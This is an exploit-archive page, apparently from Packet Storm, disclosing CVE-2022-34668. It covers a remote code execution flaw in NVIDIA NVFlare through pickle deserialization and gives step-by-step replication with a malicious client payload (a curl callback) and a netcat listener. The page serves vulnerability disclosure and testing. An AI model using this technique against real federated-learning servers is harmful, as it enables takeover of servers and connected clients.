what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

NVFLARE Unsafe Deserialization

NVFLARE Unsafe Deserialization
Posted Mar 27, 2023
Authored by Elias Hohl

NVFLARE versions prior to 2.1.4 suffers from an unsafe deserialization of user data in the pickle module.

tags | exploit
advisories | CVE-2022-34668
SHA-256 | bd13cd7a7cdea69c0838aab6a557399fa4c460b35cd16da1f7fc1ebe9d9b41c7

NVFLARE Unsafe Deserialization

Change Mirror Download
# Exploit Title: NVFLARE < 2.1.4 - Unsafe Deserialization due to Pickle
# Exploit Author: Elias Hohl
# Google Dork: N/A
# Date: 2022-06-21
# Vendor Homepage: https://www.nvidia.com
# Software Link: https://github.com/NVIDIA/NVFlare
# Version: < 2.1.4
# Tested on: Ubuntu 20.04
# CVE : CVE-2022-34668

https://medium.com/@elias.hohl/remote-code-execution-in-nvidia-nvflare-c140bb6a2d55

There is a Remote Code Execution vulnerability https://github.com/NVIDIA/NVFlare. It is possible to execute arbitrary commands on the server for connected clients. It was not investigated if server can also execute commands on all clients (I expect this though, as it is by design required for the server to instruct the clients to execute commands if they need to train specific models). The consequence would be that a client can gain Remote Code Execution on the server an ALL connected clients.

The vulnerability exists due to the deserialization of user data with the pickle module. There are multiple places where this is done, I considered line 568 on private/fed/server/fed_server.py the occurrence that is accessible with the least efforts and thus used it in my PoC-Exploit.

The client generates a malicious data packet like this: aux_message.data["fl_context"].CopyFrom(bytes_to_proto(generate_payload('curl http://127.0.0.1:4321')))



REPLICATION

This example uses the server in poc-mode. The provision mode seems to run the same code in fed_server.py though and should be vulnerable as well. (To my understanding, the modes differ only regarding credentials).

This exploit replicates the Quickstart tutorial https://nvidia.github.io/NVFlare/quickstart.html with a maliciously modified client to execute commands on the server.

Make sure to use Python 3.8, the nightly builds don't work with Python >=3.9.

sudo apt update
sudo apt-get install python3-venv curl

python3 -m venv nvflare-env

source nvflare-env/bin/activate

python3 -m pip install -U pip
python3 -m pip install -U setuptools
python3 -m pip install torch torchvision tensorboard

git clone https://github.com/NVIDIA/NVFlare.git
cd NVFlare
git checkout 2.1.2
git apply nvflare-exploit-apply.txt # note that this only modifies the client side code
python3 -m pip install .

cd
poc -n 2

mkdir -p poc/admin/transfer
cp -rf NVFlare/examples/* poc/admin/transfer

In four separate terminals, execute (after running source nvflare-env/bin/activate in each one):

./poc/server/startup/start.sh

./poc/site-1/startup/start.sh

./poc/site-2/startup/start.sh

./poc/admin/startup/fl_admin.sh localhost

In another terminal window, fire up a netcat instance to verify that Remote Code Execution is possible:
nc -lvp 4321

In the admin console, execute:

check_status server

to verify both clients are connected. Then:

submit_job hello-pt-tb

It will take a few minutes until the job finishes downloading the required files, then you should see a connection in the netcat tab and error messages in the server tab (because the received pickle payload is no data that the program can continue working with). You can also shutdown netcat, which will result in "Connection refused" errors in the server tab.

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close